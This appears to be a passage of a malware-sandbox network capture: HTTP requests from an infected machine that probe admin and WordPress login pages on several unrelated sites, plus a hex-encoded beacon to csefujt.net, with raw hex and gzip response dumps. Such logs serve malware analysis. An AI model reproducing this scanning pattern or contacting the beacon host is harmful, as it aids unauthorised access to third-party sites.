6e 2e 63 73 73 3f 76 3d 31 37 30 37 31 33 31 37 36 37 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 5f 63 75 73 74 6f 6d 5f 61 64 6d 69 6e 2e 63 73 73 3f 76 3d 31 37 30 37 31 33 31 37 36 37 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 31 2e 32 2f 74 68 65 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3575<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131767" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131767" /><link rel="stylesheet" href="//code.jquery.com/ui/1.11.2/them
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558628082 CET1286INData Raw: 65 73 2f 73 6d 6f 6f 74 68 6e 65 73 73 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 2f 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 63 6f 64 65 2e 6a 71 75 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: es/smoothness/jquery-ui.css" /><script type="text/javascript" src="//code.jquery.com/jquery-1.11.1.min.js"></script><script type="text/javascript" src="//code.jquery.com/ui/1.11.2/jquery-ui.min.js"></script><script type="text/javascri
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558691978 CET1286INData Raw: 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6e 69 63 65 73 63 72 6f 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="text/javascript" src="/js/jquery/jquery.nicescroll.js"></script><link rel="stylesheet" href="/js/jquery/icheck/skins/flat/blue.css"><script type="text/javascript" src="/js/jquery/icheck/icheck.min.js"></script><link rel="stylesheet"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558711052 CET1286INData Raw: 77 68 69 74 65 3b 7a 2d 69 6e 64 65 78 3a 35 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 09 2e 62 6f 78 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 30 70 78 20 33 70 78 20 23 33 33 33 33 33 33 3b 7a 2d 69 6e 64 65 78 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: white;z-index:5;position:relative;}.box{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}.info{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}</style>...[if IE]><script src="http://html5shiv.googleco
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558734894 CET1286INData Raw: 0a 09 09 7d 0d 0a 09 7d 29 3b 0d 0a 09 66 75 6e 63 74 69 6f 6e 20 63 6f 70 79 54 78 74 28 65 6c 65 6d 29 20 7b 0d 0a 09 09 76 61 72 20 63 6f 70 79 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }});function copyTxt(elem) {var copyText = document.getElementById(elem);copyText.select();copyText.setSelectionRange(0, 99999); /*For mobile devices*/document.execCommand("copy");$('<div>Szveg vglapra helyez
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558754921 CET1286INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 22 3e 31 32 3a 31 36 3a 30 37 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 76 61 72 20 61 64 6d 69 6e 5f 62 61 6e 6e 65 72 5f 74 69 6d 65 5f 69 6e 74 3d 73 65 74 49 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lay:inline-block;">12:16:07</b></div><script>var admin_banner_time_int=setInterval(function(){date=new Date();h=date.getHours(); if(h<10) h="0"+h; m=date.getMinutes(); if(m<10) m="0"+m; s=date.g
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558775902 CET1286INData Raw: 65 5f 66 70 73 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 62 6c 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e_fps" style="z-index:1000;left:0;top:100px;position:absolute;background-color:black;color:white;"></span></div> <script>(function() {setTimeout(function(){$('#admin_bing_bg_wrapper').fadeIn(1000);},500);setTimeout(fu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558800936 CET1286INData Raw: 0a 09 09 76 61 72 20 66 70 73 3d 30 2c 20 66 70 73 5f 73 75 6d 3d 30 2c 20 66 70 73 5f 61 6c 6c 3d 30 3b 0d 0a 09 09 76 61 72 20 77 69 6e 64 3d 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2f 31 30 30 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: var fps=0, fps_sum=0, fps_all=0;var wind=(Math.random()-Math.random())/100;var mousex, mousey=0;var fpsdown=0;// MaininitHeader();addListeners();function initHeader() {width = $('#admin_bing_bg_wrapper
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558864117 CET1286INData Raw: 75 65 73 74 41 6e 69 6d 46 72 61 6d 65 28 29 7b 0d 0a 09 09 09 69 66 28 21 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 29 20 7b 0d 0a 09 09 09 09 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 09 09 09 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uestAnimFrame(){if(!lastCalledTime) {lastCalledTime = Date.now();fps = 0;return;}delta = (Date.now() - lastCalledTime)/1000;lastCalledTime = Date.now();fps = 1/delta;fps_sum++;fps_all=fps_al
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558883905 CET1286INData Raw: 0d 0a 09 09 09 09 5f 74 68 69 73 2e 61 6c 70 68 61 20 3d 20 30 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 73 63 61 6c 65 20 3d 20 31 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 32 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 76 65 6c 6f 63 69 74 79 20 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _this.alpha = 0;_this.scale = 1+Math.random()*2;_this.velocity = Math.random();_this.life = 0;_this.speed = 0.01+Math.random()/100;}this.draw = function() {if(_this.alpha < 0 || _this.life>2 || _
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.567738056 CET1133INData Raw: 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 63 6c 61 73 73 3d 22 6e 69 63 65 63 68 65 63 6b 22 3e 0d 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ss="login"><form action="" method="POST" class="nicecheck"><input type="text" name="uname" placeholder="Username" required /><br><br><input type="password" name="pass" placeholder="Password" required /><br><br><cen


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                465192.168.2.664125185.196.8.2280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.207520008 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.453330040 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                466192.168.2.66429064.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.235790014 CET171OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.420814991 CET354INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww7.chainmine.io/admin.php?usid=27&utid=4923817456
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                467192.168.2.664252190.202.2.8080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.244395018 CET186OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.406167030 CET499INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Location: http://contribuyente.seniat.gob.ve/index.htm
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 66 38 20 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 74 72 69 62 75 79 65 6e 74 65 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 69 6e 64 65 78 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.406413078 CET186OUTGET /index.htm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: contribuyente.seniat.gob.ve
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.568466902 CET1160INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-10g
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: HttpOnly;Secure
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self';
                                                                                                                                                                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Clear-Site-Data: cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY, SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Expect-CT: enforce; max-age=43200
                                                                                                                                                                                                                                                                                                                                                                Public-Key-Pins: none
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 15 May 2023 15:21:36 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "11fc95-2dd-64624e00"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 733
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 34 37 2d 32 37 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 4d 69 72 72 6f 72 65 64 20 66 72 6f 6d 20 77 77 77 2e 73 65 6e 69 61 74 2e 67 6f 62 2e 76 65 2f 20 62 79 20 48 54 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 3c 21 2d 2d 20 2f 41 64 64 65 64 20 62 79 20 48 54 54 72 61 63 6b 20 2d 2d 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 50 61 67 65 20 68 61 73 20 6d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->... Mirrored from www.seniat.gob.ve/ by HTTrack Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT -->... Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=iso-8859-1" />... /Added by HTTrack --><HEAD><TITLE>Page has moved</TITLE></HEA
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.568485975 CET288INData Raw: 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 52 65 66 72 65 73 68 22 20 43 4f 4e 54 45 4e 54 3d 22 30 3b 20 55 52 4c 3d 68 74 74 70 3a 2f 2f 64 65 63 6c 61 72 61 63 69 6f 6e 65 73 2e 73 65 6e 69 61 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: D><BODY><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://declaraciones.seniat.gob.ve"><A HREF="http://declaraciones.seniat.gob.ve"><B>Cargando Portal...</B></A></BODY>... Created by HTTrack Website Copier/3.47-27 [XR&CO'2013] -->
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.568506002 CET83INData Raw: 54 72 61 63 6b 20 57 65 62 73 69 74 65 20 43 6f 70 69 65 72 2f 33 2e 78 20 5b 58 52 26 43 4f 27 32 30 31 33 5d 2c 20 54 68 75 2c 20 31 36 20 4a 61 6e 20 32 30 31 34 20 30 34 3a 31 34 3a 31 38 20 47 4d 54 20 2d 2d 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Track Website Copier/3.x [XR&CO'2013], Thu, 16 Jan 2014 04:14:18 GMT --></HTML>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                468192.168.2.664684192.185.5.2380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.410916090 CET170OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: multiideas.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588205099 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.23.4
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Server-Cache: true
                                                                                                                                                                                                                                                                                                                                                                X-Proxy-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ceb083c310c87d2a026e169cfe7ddc37; path=/
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec b2 6b 73 23 c9 95 25 f8 b9 d2 6c ff 83 57 c8 5a 95 39 4a 0f 84 3f c3 a3 8a a0 4c 55 ad de ee b1 66 8f 4c 8f 69 5b 53 c9 c6 40 20 92 88 aa 20 40 00 41 30 49 a9 fe fb 9e 73 3d 00 46 b2 52 a5 ec 69 cd ec ae d9 a6 31 1d 37 dc ef e3 dc 73 ce c5 e7 ff f8 df be f9 fd ff f5 9b 5f ab f5 70 db 5f be ba e0 8f ea 17 9b 9b 79 d1 6e f4 1f 7e 57 a8 65 bf 38 1c e6 c5 66 ab bf 3b 28 9c 87 e3 4d c1 c4 76 b1 c2 cf 6d 3b 2c d4 72 bd d8 1f da 61 5e fc e1 f7 ff a4 53 71 ba de 2c 6e db 79 71 ec da 87 bb ed 7e 40 a7 ed 66 68 37 48 7b e8 56 c3 7a be 6a 8f dd b2 d5 f2 f1 56 75 9b 6e e8 16 bd 3e 2c 17 7d 3b 37 6c d2 77 9b ef d5 be ed e7 c5 dd 7e fb ae eb db 42 ad f7 ed bb 79 31 9b dd dc de dd 94 db fd cd ec fd bb cd cc 30 fb d5 c5 61 b9 ef ee 86 cb d7 ef ee 37 cb a1 db 6e 5e 73 97 37 7f e6 59 ca 12 ff 06 3c 6a ae 3e bc 28 f7 ed 5d bf 58 b6 af 67 df 5e cb 8e df 5e cf de 7e f1 dd e1 8b 37 3f bc 79 bd da 2e ef 6f 01 b9 3c 05 bf ee 5b fe bc f9 ea 62 36 8e 7b 75 31 74 43 df 5e 5e dd f7 43 a7 fe 65 d5 2e 0e ea e7 3f 4b d6 98 af d4 7f bd 3f 0c 6a b1 d9 0e eb 76 af fe 7d bb 5f fd 66 df 1e 0e ea d0 0d ed c5 2c 97 4d b6 fc 62 b5 39 e8 3b 2c d8 0e cb f5 17 79 d5 2f 66 b3 77 60 ed 50 de 6c b7 37 7d bb b8 eb 0e e5 72 7b fb 85 9a 7d 42 e5 a1 7c 20 47 93 e4 17 3d 0f c3 62 e8 96 b9 e1 72 bf 3d 1c b6 fb ee a6 db e4 9e e8 07 c1 36 ed 72 78 31 ad 58 f4 43 bb df 2c 06 e8 31 3c de 41 e2 c5 dd 5d df 2d 17 24 7d b6 3f 1c 7e f1 fe b6 c7 13 f7 9b 17 1f f0 b2 5f ec ee b7 5f a9 7f 6a db d5 b3 96 b7 cc e8 98 40 24 b3 6e b3 6a df 97 77 eb bb d9 3b a4 cd 8a bf f7 f0 6f b6 b7 94 f0 f0 a9 28 96 63 fe 14 ce e7 5a ab df af bb 2c a5 ba 3f b4 07 05 8d d5 ff 29 22 a9 5f 6d 16 fd 23 88 3d a8 eb 47 75 b5 dd 1c 80 f8 5f 36 87 ee 66 8d a9 77 fd 3d 29 3e d6 65 5d 1a a5 d5 1f 0e dd e6 66 52 32 ec 17 cb ef 79 a5 d5 6c f6 f0 f0 50 de e6 06 dd d8 40 d0 29 ad 2f ff 8f 0c e3 df b6 43 fb e5 8f a6 00 1a 6c a7 96 f7 fb 3d b0 f7 8f 0a 52 be eb 6e ee f7 ed 4a 6d 37 00 3b 62 2f b1 46 9b b7 d8 3e 6c e0 d2 0d 96 04 88 ad 5a dc 63 a3 cd 40 66 5b f5 d0 0d eb 1f 6f d7 6d 64 eb 97 b3 0f ed 30 60 01 ac ba d8 b4 7d 49 ac 27 a8 ea 0f bf 02 92 55 cb 9c c9 0e b3 4f 62 4e f2 3f fb ec e2 b0 dc 77 77 c3 a8 fe d0 be 1f 66 df 2d 8e 8b 7c 5b 5c 22 e3 b3 07 a8 b7 7d 28 ff c7 c3 5d 7b bb fd ae fb dd 09 d0 5c fd b9 b8 5e 1c da 3f ec fb e2 cb 62 3d 0c 77 87 2f bf 9d 7d 3b 3b 94 0f e5 76 7f f3 ed ac bb 5d dc b4 87 6f a1 f9 be fd 76 26 c5 df ce 8c 29 6d 59 7d 3b ab ed fb da 7e 3b 2b de 16 98 89 fa f2 6e 73 83 8f c3 f1 e6 7f ae 1f 0a a5 1b 7e 7f 9d 1b 22 e2 f7 f6 7e bf 6c 8b 2f ff 5c 40 34 d2 cf b2 b1 bf b4 ff d0 aa df ce 1e ee 74 b7 59 f6 f7 2b 8e fa ee 20 17 52 a4 f7 6d 8f ac b6 bc ed 36 e5 77 87 5f 1e db fd 3c 94 a6 34 c5 0f 3f 7c 45 a2 3e 7f 77 bf 59 0e dd 76 f3 7a f1 f6 fa ed f2 cd 9f 4f df 6a c5 9b 37 7f 3e 2e f6 6a 39 ff dd 00 fb dd 94 ef f6 db db 6f d6 8b fd 37 50 f0 ab be 5c a2 f7 fe b7 ed 72 78 5d bd ad de 7e 5f 3e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1e93ks#%lWZ9J?LUfLi[S@ @A0Is=FRi17s_p_yn~We8f;(Mvm;,ra^Sq,nyq~@fh7H{VzjVun>,};7lw~By10a7n^s7Y<j>(]Xg^^~7?y.o<[b6{u1tC^^Ce.?K?jv}_f,Mb9;,y/fw`Pl7}r{}B| G=br=6rx1XC,1<A]-$}?~__j@$njw;o(cZ,?)"_m#=Gu_6fw=)>e]fR2ylP@)/Cl=RnJm7;b/F>lZc@f[omd0`}I'UObN?wwf-|[\"}(]{\^?b=w/};;v]ov&)mY};~;+ns~"~l/\@4tY+ Rm6w_<4?|E>wYvzOj7>.j9o7P\rx]~_>t
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588247061 CET1286INData Raw: ab 61 8d df 75 4b bd de bc ed cb 77 5d df ff 1e 64 bd 5e 96 8b bb bb fe f1 35 7d f7 76 f1 06 e9 d5 9b af d8 7b 35 ff be 1c b6 ff b8 18 16 7f f8 ed bf be 7e f3 9f e8 7a 3d e9 da be e8 ba 6f 87 fb 3d 76 9a cf e7 ed 0f e7 15 db d7 8b bc e0 f5 57 dd
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: auKw]d^5}v{5~z=o=vWWnX_%5+fE*{}%2wrlzz\oCL)6~l>x~?A96irocW}<k>I_d7z`_Jh>tu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.588263988 CET1286INData Raw: be db dd b7 fb c7 f1 e7 34 16 12 db d2 7f 30 f7 ef 3d 4a df 76 37 fb c5 d0 96 b7 dd e6 79 ac 87 b7 a6 53 9f 4d 33 9b 2d ee ba f2 a1 dc ee 6f 66 5f fc 35 63 74 9b 55 fb be bc 5b df 71 f4 77 87 ed 66 96 25 3d b7 29 7e bd ea 86 3f fc f6 5f 8a bc 48
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 40=Jv7ySM3-of_5ctU[qwf%=)~?_Hb?~S7xBnIDYbCptA<7)fv^]BmpnZj~}{8PB0vP/~_U%~h1"/u~,i.I
